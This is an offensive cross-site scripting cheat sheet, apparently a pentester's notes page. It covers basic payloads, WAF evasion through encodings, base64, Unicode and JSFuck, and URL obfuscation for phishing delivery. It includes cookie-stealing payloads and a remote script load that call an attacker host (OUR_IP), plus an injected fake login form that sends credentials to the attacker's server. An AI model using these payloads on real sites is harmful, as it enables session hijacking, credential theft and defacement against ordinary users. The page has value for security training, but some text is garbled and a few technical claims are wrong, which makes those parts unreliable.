Cross Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. XSS normally allows an attacker to masquerade as a victim user, carrying out any actions that the user is able to perform and accessing any of the user's data. Source: https://portswigger.net/web-security/cross-site-scripting


XSS Useful References

Awesome labs to train your XSS skills: https://xssy.uk/


XSS Tools


Basic XSS Payloads

CodeDescription

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us


XSS Filters & WAFs Evasion

Web Application Firewalls (WAFs) inspect requests, analyse payloads, and apply predefined rule sets to identify and block any malicious traffic.

WAFs can protect web applications by leveraging various techniques such as signature-based pattern matching, behaviour analysis, and anomaly detection.

This section focuses on different methods which could help you bypassing XSS filters, whether they are in place due to the web application's implementation or due to a Web Application Firewall. If you are not sure whether the web application is protected by a WAF, some basic fingerprinting checks you can perform are the following:

  • Use automated tools, such as wafw00f

  • Check if there are cookie values set by the WAF Example: F5 BIG-IP ASM releases cookies starting with TS

  • Server headers or any other uncommon header

  • Sometimes, the HTTP body contains some hints about the WAF in place.

Many more infos and WAF fingerprinting techniques can be found here: https://github.com/0xInfection/Awesome-WAF


Extra Hints & Tricks

  • If alert() is filtered, a valid (and less filtered) alternative is confirm()

  • You can close tags using // rather than >

  • Sometimes, you can access DOM Objects by just specifying their name. Instead of using document.cookie and document.domain you can use cookie and domain respectively.

  • http(s):// can be shortened to // or /\\ or \\.

  • Quotes are not required as long as you are not using spaces. For example you can use <img src=http://example.com without specifying any quotes.

  • If all HTML tags are filtered, you can sometimes use custom ones, for example: <22>alert()</22>

Alternative Encodings

If your characters are being filtered, a good starting point is trying the following alternative encodings

CharHTMLNumeric DecimalJS UniCodeNum. HexadecimalCSS (ISO)JS (Octal)URL

"

&quot;

&#34;

\u0022

u+0022

\0022

\42

%22

#

&num;

&#35;

\u0023

u+0023

\0023

\43

%23

$

&dollar;

&#36;

\u0024

u+0024

\0024

\44

%24

%

&percnt;

&#37;

\u0025

u+0025

\0025

\45

%25

&

&amp;

&#38;

\u0026

u+0026

\0026

\46

%26

'

&apos;

&#39;

\u0027

u+0027

\0027

\47

%27

(

&lpar;

&#40;

\u0028

u+0028

\0028

\50

%28

)

&rpar;

&#41;

\u0029

u+0029

\0029

\51

%29

*

&ast;

&#42;

\u002a

u+002A

\002a

\52

%2A

+

&plus;

&#43;

\u002b

u+002B

\002b

\53

%2B

,

&comma;

&#44;

\u002c

u+002C

\002c

\54

%2C

-

&minus;

&#45;

\u002d

u+002D

\002d

\55

%2D

.

&period;

&#46;

\u002e

u+002E

\002e

\56

%2E

/

&sol;

&#47;

\u002f

u+002F

\002f

\57

%2F

:

&colon;

&#58;

\u003a

u+003A

\003a

\72

%3A

;

&semi;

&#59;

\u003b

u+003B

\003b

\73

%3B

<

&lt;

&#60;

\u003c

u+003C

\003c

\74

%3C

=

&equals;

&#61;

\u003d

u+003D

\003d

\75

%3D

>

&gt;

&#62;

\u003e

u+003E

\003e

\76

%3E

?

&quest;

&#63;

\u003f

u+003F

\003f

\77

%3F

@

&commat;

&#64;

\u0040

u+0040

\0040

\100

%40

[

&lsqb;

&#91;

\u005b

u+005B

\005b

\133

%5B

\

&bsol;

&#92;

\u005c

u+005C

\005c

\134

%5C

]

&rsqb;

&#93;

\u005d

u+005D

\005d

\135

%5D

^

&Hat;

&#94;

\u005e

u+005E

\005e

\136

%5E

_

&lowbar;

&#95;

\u005f

u+005F

\005f

\137

%5F

`

&grave;

&#96;

\u0060

u+0060

\0060

\u0060

%60

{

&lcub;

&#123;

\u007b

u+007b

\007b

\173

%7b

|

&verbar;

&#124;

\u007c

u+007c

\007c

\174

%7c

}

&rcub;

&#125;

\u007d

u+007d

\007d

\175

%7d


Basic Bypasses

Whenever facing filters or blacklists on your special characters or javascript payloads, try using the following basic bypasses and alternative representations.


Alert alternatives

If alert('xss') or alert(1) are filtered, try using:

  • prompt('xss') or prompt(1)

  • confirm('xss') or confirm(1)

  • alert(/xss/.source)

  • windows/alert/.source


OnError alternatives

If onerror=alert(1) is filtered, try using:

  • onload=alert(1)

  • onfocus=alert(1) combined with autofocus=true

  • setTimeout(alert(1))

  • setInterval(alert(1))

  • Function(alert(1))()

  • setImmediate(alert(1)) [notice that this only works on IE 10+]


Img tag alternatives

If an img payload such as <img src=x onerror=alert(1)> is filtered, try using:

  • <svg/onload=alert(1)>

  • <video src=x onerror=alert(1)>

  • <audio src=x onerror=alert(1)>


Using Base64 encoded payloads

You can bypass many blacklist-based filters by using Base64-encoded payloads.

Generally speaking, you can generate the Base64-encoding of any payload and use it inside the atob JavaScript function. In particular, just use

atob("<BASE64-PAYLOAD-ENCODING>")

You could also use other base64 encoded payloads such as the following alternative to javascript:alert('XSS'): data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=


Using JavaScript Unicode Characters

Some filters can be bypassed by using the JavaScript Unicode escape sequences to represent any blacklisted word or character.

For example, if alert is blacklisted, you can use \u0061lert, where \u0061 is the Unicode escape sequence for the lowercase letter a.

A valid payload to bypass the previous blacklist example is: <script>\u0061lert(document.cookie)</script>

To represent the character โ€˜aโ€™ using a Unicode escape sequence, you would use \u0061 because the Unicode code point for 'A' is 0x61 in hexadecimal.

You can use the following JavaScript code in your browserโ€™s console to quickly gain the unicode values you need

let asciiStr = โ€œaโ€;
let unicodeHexStr = asciiStr.split('').map(c => '\\u' + ('000' + c.charCodeAt(0).toString(16)).slice(-4)).join('');
console.log(unicodeHexStr)

Unicode Normalization

Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing

Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters. Indeed, sometimes, unicode normalization even allows bypassing WAFs in place.

You can find find a great article about this topic here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/

Two lists of unicode normalized characters can be found at:

I made a tool to help converting characters to their corresponding unicode normalized value, which I suggest to anyone. You can find my helper tool to perform Unicode Normalization here: https://github.com/alessio-romano/UniXSS

If you prefer, you can also find a list of copy-paste unicode normalized characters below:

CharacterUnicode Normalization

<

%EF%BC%9C

>

%EF%BC%9E

โ‰ฎ

%e2%89%ae

&#x226e;

๏นค

%ef%b9%a4 &#xfe64;

๏ผœ

%ef%bc%9c &#xff1c;

โ‰ฏ

%e2%89%af &#x226f;

๏นฅ

%ef%b9%a5 &#xfe65;

๏ผž

%ef%bc%9e &#xff1e;

'

%ef%bc%87

"

%ef%bc%82

=

%e2%81%bc

/

%ef%bc%8f

Bypass Using JSFuck

JSFuck is an esoteric JavaScript programming language that only uses the following 6 characters to write any JavaScript code: []()!+

The (very) basic idea behind JSFuck is that you can recreate all JavaScript functionalities using such a limited set of characters because JavaScript is a weakly typed programming language, meaning that it allows the evaluation of any expression as any type. If you want to know more about its inner workings, check out this link.

The following represents an alert(1) payload written in JSFuck

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])()

Link: https://jsfuck.com/ GitHub Repo: https://github.com/aemkei/jsfuck


XSS Payloads Delivery

Exploiting XSS vulnerabilities requires users to land on the vulnerable URL, meaning that you will need to use some degree of social engineering to correctly deliver the URL containing your payload.

The URL obfuscation techniques in this section can be handy in bypassing a filtered system, or to just shorten the vector to respect a length limit.


URL Shortening Obfuscation

You can use known URL shorteners (or host your own) to basically hide the malicious link you are pointing to.

Since this technique has started to spread as an attack vector to send links to malicious resources, some service providers have implemented features to preview where the shortened links points.

You can use shorteners such as:


URL UserInfo Obfuscation

UserInfo is a subcomponent used to specify the credentials to authenticate to a specified resource. If the resource requires no authentication, this subcomponent is ignored by both the browser and the server.

Not all browsers freely allow using the UserInfo subcomponent:

  • Firefox and Opera show alert messages to notify the user.

  • Google Chrome allows this behaviour silently!

The UserInfo subcomponent is normally used as follows: username:password@google.com

You can obfuscate your malicious URL by using a trusty-looking userinfo value such as www.google.com:searchqwhatever@google.com

Also notice that userinfo allows UniCode characters! An example is: ์œ„ํ‚ค๋ฐฑ๊ณผ:๋Œ€๋ฌธ:์œ„ํ‚ค๋ฐฑ๊ณผ:๋Œ€๋ฌธ@google.com


URL Alternative Representations

You can obfuscate the host subcomponent by using different alternative representations for it. Rather than using the standard hostname or dotted-decimal IP representations, you can use the following alternatives.

It is also possible to mix the representations below to make an hybrid. Also, this tool can help you generating the alternative representations quicker: http://www.silisoftware.com/tools/ipconverter.php


DWORD (Double Word)

The IP address is translated in an equivalent 16bit number. For example, one of Google's IP addresses (216.58.215.78) can be translated to 3627734862, meaning that it can be accessed using http://3627734862.

To obtain the DWORD for a target IP (192.168.1.1 in the example), use the following JavaScript oneliner in a browser

console.log("192.168.1.1".split('.').reduce((dword, octet) => (dword << 8) + Number(octet), 0) >>> 0);

OCTAL

An IP address can also be represented in Octal form by converting the IP to base8. The result, still using Google's IP is: http://0330.0072.0327.0116

We can also "feed" each number by adding leading zeroes without break the original value as follows: http://0000000330.0000000072.0000000327.000000116 This extra case, however, does not work in Internet Explorer.

To obtain the Octal for a target IP (192.168.1.1 in the example), use the following JavaScript oneliner in a browser

console.log("192.168.1.1".split('.').map(octet => '0' + (+octet).toString(8)).join('.'));

HEXADECIMAL

An IP address can also be represented in Hexadecimal form by converting the IP to base16. The result, still using Google's IP is: http://0xd83ad74e

Each number can also be separated like this: http://0xd8.0x3a.0xd7.0x4e

To obtain the Hexadecimal for a target IP (192.168.1.1 in the example), use the following JavaScript oneliner in a browser:

console.log("192.168.1.1".split('.').map(octet => '0x' + (+octet).toString(16)).join('.'));

XSS - Other Attacks

XSS attacks are not just about popping the alert message containing cookies.

This section describes some alternative attacks you can perform by exploiting XSS vulnerabilities


Open Redirect to XSS

Whenever you are facing a web application which is vulnerable to Open Redirects, it might also be the case that the same vector can be used to gain XSS.

An example might be a website which allows for open redirects by leveraging a GET parameter, such as the following: vulnerable.com/test.php?redirect_url={value}

Instead of using the standard http or https protocols followed by your attacker website, you might insert a javascript payload as the value of the redirect_url parameter. For example, you could navigate to the following URL to pop an alert: vulnerable.com/test.php?redirect_url=javascript:alert(document.domain)


XSS Session Hijacking

  • Use the following XSS Payload: <script src=http://OUR_IP/script.js></script>

  • On the attacker machine, write one of the following payload inside a file named script.js:

    1. new Image().src='http://OUR_IP/index.php?c='+document.cookie

    2. document.location='http://OUR_IP/index.php?c='+document.cookie;


XSS Phishing

You can use wget or other tools such as goclone to clone a website's content.

After that, you can use tools such as urlcrazy to generate domain names similar to the one you are trying to target via the commandline, e.g. you can just use urlcrazy www.example.com to generate all the useful, similar domain names for phishing attempts

Another form of XSS phishing can be obtained by leveraging stored XSS vulnerabilities to inject a fake login form that sends the credentials to our attacker server

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

XSS Defacing

  • Defacing means changing the website's appearance for anyone who visits the website

  • The website's appearance can be changed using injected Javascript code

  • Note: This requires a stored XSS Vulnerability

Defacing PayloadDescription

<script>document.body.style.background = "#141d2b"</script>

Change website background color

<script>document.body.background = "https://example.com/images/logo.svg"</script>

Change website background image

<script>document.title = 'New Title'</script>

Change website title

document.getElementById("todo").innerHTML = "New Text"

Change HTML element/DOM text using innerHTML

Miscellaneous

Bypassing HTTPOnly - Cross Site Tracing (XST)

A Cross-Site Tracing (XST) attack involves the use of Cross-site Scripting (XSS) and the TRACE or TRACK HTTP methods.

The HTTP TRACE method allows the client to see what is being received at the other end of the request chain and use that data for testing or diagnostic information.

The TRACK method works in the same way but is specific to Microsoftโ€™s IIS web server.

Using XST, an attacker can steal userโ€™s cookies even if they have the โ€œHttpOnlyโ€ flag, as the TRACE method will reflect back the input userโ€™s request, revealing any Cookies or Authorization header.

OWASP provides several examples about this attack that you can check out.

This technique is quite old: modern browsers typically block the HTTP TRACE method inside scripting languages and libraries. The only way to effectively leverage XST is to use existing alternatives to JavaScript such as Java

Last updated